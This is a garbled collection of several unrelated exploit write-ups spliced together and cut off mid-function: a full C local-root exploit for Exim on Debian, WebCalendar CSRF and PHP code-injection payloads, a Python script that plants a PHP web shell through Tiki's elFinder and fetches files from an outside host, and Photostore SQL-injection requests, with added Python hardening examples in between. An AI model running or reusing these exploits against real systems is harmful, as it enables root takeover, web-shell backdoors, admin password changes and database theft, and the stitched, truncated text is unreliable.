/*
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Hello List,
This is just a minor issue in Exim, no replies so far, so publication
should be OK.
Introduction:
============
Exim4 in some variants is started as root but switches to uid/gid
Debian-exim/Debian-exim. But as Exim might need to store received
messages in user mailboxes, it has to have the ability to regain
privileges. This is also true when Exim is started as "sendmail".
During internal operation, sendmail (Exim) will manipulate message
spool files in directory structures owned by user "Debian-exim"
without caring about symlink attacks. Thus execution of code as
user "Debian-exim" can be used to gain root privileges by invoking
"sendmail" as user "Debian-exim".
POC:
===
http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/EximUpgrade.c
demonstrates the issue using an ELF file that is both an executable
and a shared library and which is invoked multiple times by different
processes.
Results, Discussion:
===================
As the Exim4 process itself is already quite privileged - it has to
access the user mailboxes with different UIDs anyway - having
such problems is expectable and explainable. A change in documentation
might make sense, to indicate, that the special user "Debian-exim"
is only intended to mark files being used by the daemon, but not
to provide root/daemon user privilege separation.
Even without this vulnerability, a "Debian-exim" process could
use http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
to escalate to "adm" group, which again makes it very likely to
use "syslog", "apache" or other components to escalate to root
via "/var/log". This is annoying, perhaps this should get a CVE
to make daemon-to-root escalations harder in general.
Timeline:
========
20160605: Discovery, report Debian security
20160607: Writeup
20160611: Also verified in Ubuntu, https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/
20160630: Publication
References:
==========
* http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/
* http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
* https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/
-----BEGIN PGP SIGNATURE-----
iEYEAREKAAYFAld0lPUACgkQxFmThv7tq+5MeACePVuh5CppGyhUudMfK7kjDXjj
8mcAn2AcZFVEwUKSHadffJJyCNLP0X7H
=4IJk
-----END PGP SIGNATURE-----
* This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2016 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/
* for more information.
*
* Compile: gcc -fPIC -shared -Xlinker -init=_libInit -Xlinker '--soname=LIBPAM_1.0' -Xlinker --default-symver -o EximUpgrade EximUpgrade.c -Wl,-e_entry
* Use: Run as "Debian-exim": ./EximUpgrade --Upgrade
*/
#define _GNU_SOURCE
#include <assert.h>
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>
#define UPGRADE_FILE_NAME "/var/spool/exim4/EximUpgrade"
#define UPGRADE_LIB_DIR "/var/spool/exim4"
#define TARGET_PATH "/lib/x86_64-linux-gnu/libpam.so.0.83.1"
extern char **environ;
#if defined(__x86_64__)
const char lib_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2";
#define init_args(argc, argv) __asm__ volatile ( \
"mov 0x8(%%rbp), %%edx \n\tmov %%edx, %0 \n\tlea 0x10(%%rbp), %1 \n\t" \
:"=m"(argc), "=r"(argv)::"memory")
#endif /* __x86_64__ */
/** Library initialization function, called by the dynamic linker when
 * this file is loaded as a shared object. If not named _init, the name
 * has to be set during linking using -init=name. When the loading
 * process is root (su, after libpam.so.0 has been replaced with this
 * file, see --Upgrade below), it makes the exploit binary setuid root.
 */
extern void _libInit() {
if(geteuid()!=0) return;
int result=chown(UPGRADE_FILE_NAME, 0, 0);
assert(!result);
result=chmod(UPGRADE_FILE_NAME, 04755);
assert(!result);
exit(0);
}
int main(int argc, char **argv);
/* ELF entry point when this file is executed directly: recover argc/argv
 * from the initial stack and continue in main(). */
extern void _entry (void) {
int argc=0;
char **argv = NULL;
init_args(argc, argv);
int result=main(argc, argv);
exit(result);
}
/* Exported stubs so that the dynamic linker accepts this file in place of
 * libpam.so.0; _libInit runs first and exits the process when it is root. */
extern void pam_start() {}
extern void pam_set_item() {}
extern void pam_chauthtok() {}
extern void pam_end() {}
extern void pam_strerror() {}
extern void pam_getenvlist() {}
extern void pam_open_session() {}
extern void pam_close_session() {}
extern void pam_get_item() {}
extern void pam_acct_mgmt() {}
extern void pam_setcred() {}
extern void pam_authenticate() {}
int main(int argc, char **argv) {
DIR *dirStruct;
struct dirent *dirEnt;
char linkPath[1024];
int result;
assert(argc>1);
if(!strcmp(argv[1], "--Exec")) {
setresgid(0, 0, 0);
setresuid(0, 0, 0);
execve(argv[2], argv+2, environ);
fprintf(stderr, "Exec failed\n");
return(1);
}
if(!strcmp(argv[1], "--Repair")) {
int targetFd=open(TARGET_PATH, O_RDWR);
assert(targetFd>=0);
result=chown(TARGET_PATH, atoi(argv[2]), atoi(argv[3]));
assert(!result);
chmod(TARGET_PATH, atoi(argv[4]));
return(0);
}
if(!strcmp(argv[1], "--Upgrade")) {
struct stat origStatData;
stat(TARGET_PATH, &origStatData);
char *execArgs[6];
/* Child: submit a message via sendmail (Exim, started as root) so that
 * new spool files appear under /var/spool/exim4 while we race below. */
int childPid=fork();
if(!childPid) {
int inputFd=open("/dev/null", O_RDONLY);
dup2(inputFd, 0);
execArgs[0]="/usr/sbin/sendmail";
execArgs[1]="root@localhost";
execArgs[2]=NULL;
result=execve(execArgs[0], execArgs, environ);
assert(!result);
return(0);
}
/* Race: as soon as a message ID shows up in msglog/, plant a symlink with
 * the matching -J name in input/ pointing at the target library; Exim's
 * root-privileged spool handling then chowns the link target. The message
 * ID is copied at offset 23 = strlen("/var/spool/exim4/input/"). */
strcpy(linkPath, "/var/spool/exim4/input/xxxxxx-xxxxxx-xx-J");
dirStruct=opendir("/var/spool/exim4/msglog");
assert(dirStruct);
result=1;
while(result) {
while((dirEnt=readdir(dirStruct))) {
if(*dirEnt->d_name=='.') continue;
// Be fast, perhaps aligned word copy needed. Pray to 23 in demo.
strncpy(linkPath+23, dirEnt->d_name, 16);
result=symlink(TARGET_PATH, linkPath);
assert(!result);
fprintf(stderr, "Relinked %s\n", linkPath);
break;
}
rewinddir(dirStruct);
}
closedir(dirStruct);
/* Wait until the privileged Exim has followed the symlink and changed
 * the owner of the target library. */
while(1) {
struct stat currentStatData;
stat(TARGET_PATH, &currentStatData);
if(currentStatData.st_uid!=origStatData.st_uid) break;
sleep(1);
}
waitpid(childPid, NULL, 0);
fprintf(stderr, "Target ready for writing\n");
/* The library now belongs to us: keep a copy of it, overwrite it with this
 * ELF (which exports the pam_* symbols), run su so that a root process loads
 * it and _libInit makes UPGRADE_FILE_NAME setuid root, then put the original
 * content back. */
int targetFd=open(TARGET_PATH, O_RDWR);
assert(targetFd>=0);
char *origData=(char*)malloc(origStatData.st_size);
result=read(targetFd, origData, origStatData.st_size);
assert(result==origStatData.st_size);
struct stat newStatData;
stat(UPGRADE_FILE_NAME, &newStatData);
char *newData=(char*)malloc(newStatData.st_size);
int selfFd=open(UPGRADE_FILE_NAME, O_RDONLY);
result=read(selfFd, newData, newStatData.st_size);
assert(result==newStatData.st_size);
close(selfFd);
ftruncate(targetFd, 0);
lseek(targetFd, 0, SEEK_SET);
result=write(targetFd, newData, newStatData.st_size);
assert(result==newStatData.st_size);
fsync(targetFd);
childPid=fork();
if(!childPid) {
execArgs[0]="/bin/su";
execArgs[1]=NULL;
result=execve(execArgs[0], execArgs, environ);
assert(!result);
return(0);
}
waitpid(childPid, NULL, 0);
ftruncate(targetFd, 0);
lseek(targetFd, 0, SEEK_SET);
result=write(targetFd, origData, origStatData.st_size);
close(targetFd);
/* Restore the original owner and mode through the now setuid-root binary. */
childPid=fork();
if(!childPid) {
char numbers[128];
char *ptr=numbers;
execArgs[0]=UPGRADE_FILE_NAME;
execArgs[1]="--Repair";
result=sprintf(ptr, "%d", origStatData.st_uid);
execArgs[2]=ptr; ptr+=result+1;
result=sprintf(ptr, "%d", origStatData.st_gid);
execArgs[3]=ptr; ptr+=result+1;
result=sprintf(ptr, "%d", origStatData.st_mode);
execArgs[4]=ptr;
execArgs[5]=NULL;
result=execve(execArgs[0], execArgs, environ);
assert(!result);
return(0);
}
waitpid(childPid, NULL, 0);
/* Finally: a root shell. */
execArgs[0]=UPGRADE_FILE_NAME;
execArgs[1]="--Exec";
execArgs[2]="/bin/bash";
execArgs[3]="-c";
execArgs[4]="id; exec $0";
execArgs[5]=NULL;
execve(execArgs[0], execArgs, environ);
return(1);
}
fprintf(stderr, "Usage: %s --Upgrade or --Exec [args]\n", argv[0]);
return(1);
}
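What the post describes, as an added example that is neither halfdog's code nor Exim's: a privileged process that opens a spool file by path inside a directory a less privileged uid controls follows whatever that uid planted there. The hardened open works relative to an already-opened directory descriptor with O_NOFOLLOW and checks the opened object with fstat before acting on it. The exploit above abuses a chown; this example uses an open-and-write so it runs unprivileged, with a constructed temporary directory standing in for /var/spool/exim4/input and a file named "victim" standing in for the library.

```python
import os
import stat
import tempfile

SPOOL_NAME = "xxxxxx-xxxxxx-xx-J"   # constructed: the -J name pattern EximUpgrade.c plants


def spool_open_unsafe(path):
    """The pattern the post describes: open the spool path by name and trust it.
    A symlink planted by the directory owner is silently followed."""
    return os.open(path, os.O_RDWR)


def spool_open_safe(dir_fd, name, expected_uid):
    """Open NAME relative to an already-opened spool directory, refuse to follow
    a symlink, and verify what was actually opened before touching it."""
    fd = os.open(name, os.O_RDWR | os.O_NOFOLLOW | os.O_NOCTTY, dir_fd=dir_fd)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("spool entry is not a regular file")
        if st.st_uid != expected_uid:
            raise PermissionError("spool entry is not owned by the spool user")
        if st.st_nlink != 1:
            raise PermissionError("spool entry is hard-linked elsewhere")
    except Exception:
        os.close(fd)
        raise
    return fd


def demo():
    """Constructed scenario in a temp dir: 'victim' stands in for the root-owned
    libpam.so.0, 'spool' for /var/spool/exim4/input. Returns the pair
    (victim_overwritten_by_unsafe_open, symlink_refused_by_safe_open)."""
    with tempfile.TemporaryDirectory() as base:
        victim = os.path.join(base, "victim")
        with open(victim, "w") as f:
            f.write("original")
        spool = os.path.join(base, "spool")
        os.mkdir(spool)
        os.symlink(victim, os.path.join(spool, SPOOL_NAME))

        # Unsafe open: the write lands in 'victim', exactly like Exim's chown did.
        fd = spool_open_unsafe(os.path.join(spool, SPOOL_NAME))
        os.write(fd, b"overwritten")
        os.close(fd)
        with open(victim) as f:
            overwritten = f.read() == "overwritten"

        # Safe open: O_NOFOLLOW makes the kernel fail the open (ELOOP) on the
        # link, while a genuine regular spool file is still accepted.
        dir_fd = os.open(spool, os.O_RDONLY | os.O_DIRECTORY)
        try:
            try:
                spool_open_safe(dir_fd, SPOOL_NAME, os.getuid())
                refused = False
            except OSError:
                refused = True
            regular = "yyyyyy-yyyyyy-yy-D"
            with open(os.path.join(spool, regular), "w") as f:
                f.write("message body")
            os.close(spool_open_safe(dir_fd, regular, os.getuid()))
        finally:
            os.close(dir_fd)
    return overwritten, refused


if __name__ == "__main__":
    print(demo())
```

For the chown step itself the same discipline is os.fchown on the verified descriptor (or os.chown(..., follow_symlinks=False), which at worst changes the owner of the symlink itself). The uid and link-count checks matter because O_NOFOLLOW alone says nothing about a hard link to somebody else's file.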
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
==========================
www.k5n.us/webcalendar.php
Product:
==================
WebCalendar v1.2.7
WebCalendar is a PHP-based calendar application that can be configured as a
single-user calendar, a multi-user calendar for groups of users, or as an
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2,
Interbase, MS SQL Server, or ODBC is required.
WebCalendar can be setup in a variety of ways, such as...
A schedule management system for a single person
A schedule management system for a group of people, allowing one or more
assistants to manage the calendar of another user
An events schedule that anyone can view, allowing visitors to submit new
events
A calendar server that can be viewed with iCalendar-compliant calendar
applications like Mozilla Sunbird, Apple iCal or GNOME Evolution, or
RSS-enabled applications like Firefox, Thunderbird, RSSOwl, FeedDemon,
or BlogExpress.
Vulnerability Type:
======================
CSRF PROTECTION BYPASS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
WebCalendar attempts to use the HTTP Referer header to check that requests
originate from the same server, as we see below.
From WebCalendar's "include/functions.php" file on line 6117:
////////////////////////////////////////////////////////////
function require_valide_referring_url ()
{
global $SERVER_URL;
if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
// Missing the REFERER value
//die_miserable_death ( translate ( 'Invalid referring URL' ) );
// Unfortunately, some version of MSIE do not send this info.
return true;
}
if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
// Gotcha. URL of referring page is not the same as our server.
// This can be an instance of XSRF.
// (This may also happen when more than address is used for your server.
// However, you're not supposed to do that with this version of
// WebCalendar anyhow...)
die_miserable_death ( translate ( 'Invalid referring URL' ) );
}
}
/////////////////////////////////////////////////////////////////////////////////////////
However, the check fails open: a request that carries no Referer at all is
accepted. HTML5 offers a referrer policy meta tag,
<meta name="referrer" content="none">, that makes the browser omit the
Referer header when making an HTTP request (at the time of writing supported
in Chrome, Safari, Mobile Safari and other WebKit-based browsers; the
standardized spelling of the same policy is no-referrer, and a
Referrer-Policy response header on the attacker's page or a link with
rel="noreferrer" has the same effect). With the header suppressed, the
vulnerable application happily processes our CSRF requests.
Exploit code(s):
===============
1) CSRF Protection Bypass to change Admin password POC. Note: the name of
the victim user is required for success.
<meta name="referrer" content="none">
<form id="CSRF" action="http://localhost/WebCalendar-1.2.7/edit_user_handler.php" method="post">
<input type="hidden" name="formtype" value="setpassword" />
<input type="hidden" name="user" value="admin" />
<input name="upassword1" id="newpass1" type="password" value="1234567" />
<input name="upassword2" id="newpass2" type="password" value="1234567" />
</form>
<script>document.getElementById('CSRF').submit()</script>
2) CSRF Protection Bypass modify access controls under "System Settings" /
"Allow public access"
<meta name="referrer" content="none">
<form id="CSRF_ACCESS_CTRL" action="http://localhost/WebCalendar-1.2.7/admin.php" method="post" name="prefform"><br />
<input type="hidden" name="currenttab" id="currenttab" value="settings" />
<input type="submit" value="Save" name="" />
<input type="hidden" name="admin_PUBLIC_ACCESS" value="Y" />
<script>document.getElementById('CSRF_ACCESS_CTRL').submit()</script>
</form>
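The fail-open behaviour and the regex match in require_valide_referring_url() above, as an added example (not WebCalendar's code): the first function is a Python transcription of the PHP check, the second is a fail-closed replacement using a per-session synchronizer token, which is what the application would need instead. $SERVER_URL and the origin are constructed values. The third request in demo() shows a consequence of the unanchored preg_match that the advisory does not discuss: a Referer that merely contains the server URL also passes.

```python
import hmac
import re
import secrets

# Stand-in for WebCalendar's $SERVER_URL; the real value comes from settings.php.
SERVER_URL = "http://localhost/WebCalendar-1.2.7/"
SERVER_ORIGIN = "http://localhost"


def referer_check_as_shipped(server_url, headers):
    """Python transcription of require_valide_referring_url(): returns True when
    the request is let through."""
    referer = headers.get("Referer", "")
    if referer == "":
        return True  # fail-open: a request without Referer is trusted
    # preg_match("@$SERVER_URL@i", ...): unanchored and unescaped, so the
    # server URL only has to occur somewhere in the header value.
    return re.search(server_url, referer, re.IGNORECASE) is not None


def issue_token():
    """Per-session synchronizer token: kept server-side, echoed into each form."""
    return secrets.token_urlsafe(32)


def csrf_check_hardened(session_token, form_token, headers, server_origin):
    """Fail-closed replacement: a state-changing request needs the session's token,
    and an Origin/Referer that is present must belong to our own origin."""
    if not session_token or not form_token:
        return False
    if not hmac.compare_digest(session_token.encode(), form_token.encode()):
        return False
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value is None:
            continue
        if value != server_origin and not value.startswith(server_origin + "/"):
            return False
    return True


def demo():
    """Three requests against each check; returns (shipped_results, hardened_results)."""
    no_referer = {}  # what <meta name="referrer" content="none"> produces
    foreign = {"Referer": "http://attacker.example/csrf.html"}
    smuggled = {"Referer": "http://attacker.example/?" + SERVER_URL}
    shipped = (
        referer_check_as_shipped(SERVER_URL, no_referer),  # accepted
        referer_check_as_shipped(SERVER_URL, foreign),     # rejected
        referer_check_as_shipped(SERVER_URL, smuggled),    # accepted: regex is unanchored
    )
    token = issue_token()
    own_page = {"Referer": SERVER_URL + "edit_user.php"}
    hardened = (
        csrf_check_hardened(token, None, no_referer, SERVER_ORIGIN),  # attacker page has no token
        csrf_check_hardened(token, token, own_page, SERVER_ORIGIN),   # legitimate form post
        csrf_check_hardened(token, token, foreign, SERVER_ORIGIN),    # right token, wrong origin
    )
    return shipped, hardened


if __name__ == "__main__":
    print(demo())
```

The token is what closes the hole: an attacker's page can suppress or forge headers, but cannot read a secret tied to the victim's session. The Origin/Referer comparison is kept only as defence in depth and is exact-prefix, not a regex.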
#######################################################
Vulnerability Type:
======================
PHP Code Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Since WebCalendar's install script is not removed after installation (there
is no "automatic" removal of it), low privileged users can inject arbitrary
PHP code through the "Database Cache" directory value: no input validation
exists for this field when a user installs the application using the
WebCalendar walk-through wizard.
If WebCalendar's installation script is available as part of a default
image, often as a convenience by some hosting providers, this can be used
to gain code execution on the target system. The only requirement is that
the user must have privileges to authenticate to the MySQL database and to
run the install script. So, users who have install wizard access for the
WebCalendar application now have the ability to launch arbitrary system
commands on the affected host.
One problem we must overcome is that WebCalendar filters double quotes ("),
so we cannot use code like <?php echo "/bin/cat /etc/passwd"; ?>. However,
we can defeat this obstacle using the all too often forgotten backtick
`CMD` operator, which hands its contents to the shell and returns the output.
e.g.
*/?><?php echo `/bin/cat /etc/passwd`; ?>
This results in "settings.php" being written like the following. The leading
*/ closes the block comment the installer wraps the settings in, ?> leaves
PHP mode, and the <?php ... ?> that follows is live code, executed whenever
settings.php is included:
<?php
/* updated via install/index.php on Wed, 15 Jun 2016 09:44:34 -0400
install_password: e99a18c428cb38d5f260853678922e03
db_type: mysql
db_host: localhost
db_database: intranet
db_login: admin
db_password: abc123
db_persistent: false
db_cachedir: */?><?php echo `/bin/cat /etc/passwd`; ?>
readonly: false
user_inc: user.php
use_http_auth: false
single_user: false
# end settings.php */
?>
Exploitation steps:
=====================
1) Login to the WebCalendar Installation Wizard.
2) Proceed to step 2 of the install script:
http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch&page=2
3) Click the "Test Settings" button to ensure the connection to the database works.
4) Enter the PHP code below as the value of the "Database Cache Directory:"
input field; this one pops the calculator as a PoC on Windows.
*/?><?php exec(`calc.exe`); ?>
5) Click the "Next" button
6) Click the "Next" button
7) Click the "Save settings" button
BOOOOOOOM! "settings.php" gets overwritten and injected with our PHP code.
If you happen to get the error "Failure Reason: Database Cache Directory
does not exist" when clicking the "Test Settings" button, just click the
back button and then forward, or click "Test settings" again, to get past
the error.
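How the injected value ends up executable, as an added example (not WebCalendar's installer code): the renderer reproduces the settings.php layout shown above, the scanner models which parts of the file PHP will execute, and validate_cachedir() is the allowlist check the installer lacks. The comment template and the sample settings are constructed; the payload is the advisory's.

```python
import re

# Payload from the advisory: closes the comment, leaves PHP mode, opens live code.
INJECTED = "*/?><?php echo `/bin/cat /etc/passwd`; ?>"

SAFE_PATH = re.compile(r"^[A-Za-z0-9_./:\\-]+$")


def filter_quotes(value):
    """The only filtering the advisory reports: double quotes are dropped."""
    return value.replace('"', "")


def render_settings_as_installed(settings):
    """Same layout as the settings.php shown above: every value is written raw
    into one PHP block comment (constructed; the installer's code is not on the page)."""
    body = "\n".join(f"{key}: {value}" for key, value in settings.items())
    return f"<?php\n/* updated via install/index.php\n{body}\n# end settings.php */\n?>\n"


def live_code_segments(source):
    """Minimal model of how PHP reads the file: text between '<?php' and '?>' that
    is not inside a '/* ... */' comment is executed. Returns those pieces."""
    segments, buf = [], ""
    in_php = in_comment = False
    i = 0
    while i < len(source):
        if not in_php:
            if source.startswith("<?php", i):
                in_php, i = True, i + 5
            else:
                i += 1
        elif in_comment:
            if source.startswith("*/", i):
                in_comment, i = False, i + 2
            else:
                i += 1
        elif source.startswith("/*", i):
            in_comment, i = True, i + 2
        elif source.startswith("?>", i):
            if buf.strip():
                segments.append(buf.strip())
            buf, in_php, i = "", False, i + 2
        else:
            buf += source[i]
            i += 1
    return segments


def validate_cachedir(value):
    """Allowlist instead of a quote blocklist: a cache directory is a plain path."""
    if not SAFE_PATH.match(value) or ".." in value:
        raise ValueError("db_cachedir is not a plain path")
    return value


def demo():
    """Returns (live code in a clean file, live code after injection, payload rejected)."""
    base = {"db_type": "mysql", "db_host": "localhost", "db_cachedir": "/tmp/webcal"}
    clean = live_code_segments(render_settings_as_installed(base))
    hostile = dict(base, db_cachedir=filter_quotes(INJECTED))  # the filter changes nothing
    injected = live_code_segments(render_settings_as_installed(hostile))
    try:
        validate_cachedir(INJECTED)
        rejected = False
    except ValueError:
        rejected = True
    return clean, injected, rejected


if __name__ == "__main__":
    print(demo())
```

Stripping one character class never makes a value safe to embed in source code; the durable fix is to validate against what the field is (a path) and, for anything that must hold arbitrary text, to emit it as a properly escaped PHP string literal rather than inside a comment.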
Disclosure Timeline:
===============================
Vendor Notification: No replies
July 4, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
#!/usr/bin/python
# недействительный 31337 Team
# p4yl04d = https://bethebeast.pl/?p=953 [[::ch4n6e 1p::]]
# Uploads a PHP web shell through the elFinder connector bundled with Tiki
# (vendor_extra/elfinder). Change the IPs: 192.168.1.152 is the target,
# 192.168.1.10 the host the shell fetches files from via ?fupload=.
import requests

url = 'http://192.168.1.152:8080/tiki/vendor_extra/elfinder/php/connector.minimal.php'
headers = {
    'Host': '192.168.1.152:8080',
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
    'Content-Type': 'multipart/form-data; boundary=_Part_1337'
}
# Hand-built multipart/form-data body; RFC 2046 requires CRLF line endings.
# target "l1_Lw" is elFinder's hash of "/" on volume l1: base64("/") = "Lw=="
# with the padding stripped, i.e. the volume root.
payload = (
    '--_Part_1337\r\n'
    'Content-Disposition: form-data; name="cmd"\r\n\r\n'
    'upload\r\n'
    '--_Part_1337\r\n'
    'Content-Disposition: form-data; name="target"\r\n\r\n'
    'l1_Lw\r\n'
    '--_Part_1337\r\n'
    'Content-Disposition: form-data; name="upload[]"; filename="evil.php"\r\n'
    'Content-Type: application/octet-stream\r\n\r\n'
    '/*<?php /**/ error_reporting(0); if (isset($_REQUEST["fupload"])) { file_put_contents($_REQUEST["fupload"], file_get_contents("http://192.168.1.10/" . $_REQUEST["fupload"]));};if (isset($_REQUEST["fexec"])) { echo "<pre>" . shell_exec($_REQUEST["fexec"]) . "</pre>";};\r\n'
    '--_Part_1337--\r\n'
)
# If your target uses authentication then use:
# upload = requests.post(url, headers=headers, data=payload, auth=('admin', 'admin'))
upload = requests.post(url, headers=headers, data=payload)
# elFinder answers with JSON: an "added" entry on success, "error" otherwise.
print(upload.status_code)
print(upload.text)
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Ktools Photostore <= 4.7.5 Multiple Vulnerabilities
# Bug discovered by Yakir Wizman
# Date 01/07/2016
# Affected versions prior to 4.7.5
# Vendor Homepage - http://www.ktools.net
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Author will be not responsible for any damage.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# About the Application:
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# PhotoStore is a professional photo gallery & shopping cart software which contains the following basic features as described below:
#
# Sell various sizes or formats of the same photo.
# Sell photos, vector art, zip files and more.
# Sell videos PhotoStore Pro Only
# Sell prints, artwork, products, packages, digital collections and more.
# Built in shopping cart and ecommerce system to accept credit cards and/or check payments.
# Email notifications to both you and the customer upon purchase.
# Customers can instantly download after payment.
# Customers can instantly download their files after payment.
# Connects to PayPal and 2Checkout.
# Built in credit system to allow your customers to buy credits.
# Allow your members to upload and sell their photos and other media while you take a commission.
# The vulnerabilities described below do not require any legitimate user account to exploit them.
# The Photostore application is prone to multiple vulnerabilities, such as SQL Injection and Cross Site Scripting, none of which require a legitimate user or admin privilege to exploit.
# A potential attacker can exploit those vulnerabilities to retrieve all the data stored in the application's database (SQL Injection) or to mount cookie stealing / phishing attacks (Cross Site Scripting).
# SQL Injection (error based) Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# SQL Injection (Severity is Critical)
# The vulnerable parameter is "gallerySortType", which is not sanitized and is sent by the user in order to retrieve the gallery objects ordered ASC or DESC in the SQL query.
# Request Data #1 is:
POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://www.example.net/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: www.ktoolsdemos.net
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length: 221
Content-Type: application/x-www-form-urlencoded
postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,[SQL_PAYLOAD]
# Inserted payload for example:
postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,(SELECT 9713 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(9713=9713,1))),0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
###
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
###
# The vulnerable parameter is "gallerySortBy", which is not sanitized and is sent by the user in order to select the column the gallery objects are sorted by in the SQL query.
# Request Data #2 is:
POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://server/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: server
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
postGalleryForm=1&gallerySortBy=id[SQL_PAYLOAD]&gallerySortType=asc
# Inserted payload for example:
postGalleryForm=1&gallerySortBy=id AND (SELECT 7522 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7522=7522,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&gallerySortType=asc
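The ORDER BY injection behind both requests above, as an added example that is not Photostore's code: the query builder models the concatenation the advisory implies, the oracle turns one gallerySortBy injection into a yes/no answer by flipping the row order, and leak_hash() extracts the admin password hash with it. Schema, rows and the hash are constructed, and the database is SQLite, so the probe is a boolean-based variant rather than the MySQL FLOOR(RAND(0)*2) error trick in the page's payload; the allowlisted builder is the fix.

```python
import sqlite3

# Constructed schema and rows; Photostore's real tables are not on the page.
SCHEMA = """
CREATE TABLE media(media_id INTEGER, title TEXT, date_added TEXT);
INSERT INTO media VALUES (1, 'b', '2016-01-01'), (2, 'a', '2016-02-01');
CREATE TABLE admins(username TEXT, password TEXT);
INSERT INTO admins VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""

ALLOWED_SORT_COLUMNS = {"media_id": "media_id", "title": "title", "date": "date_added"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def gallery_query_as_shipped(sort_by, sort_type):
    """Models what the two requests above imply: both parameters are pasted
    verbatim into ORDER BY."""
    return f"SELECT media_id, title FROM media ORDER BY {sort_by} {sort_type}"


def gallery_query_allowlisted(sort_by, sort_type):
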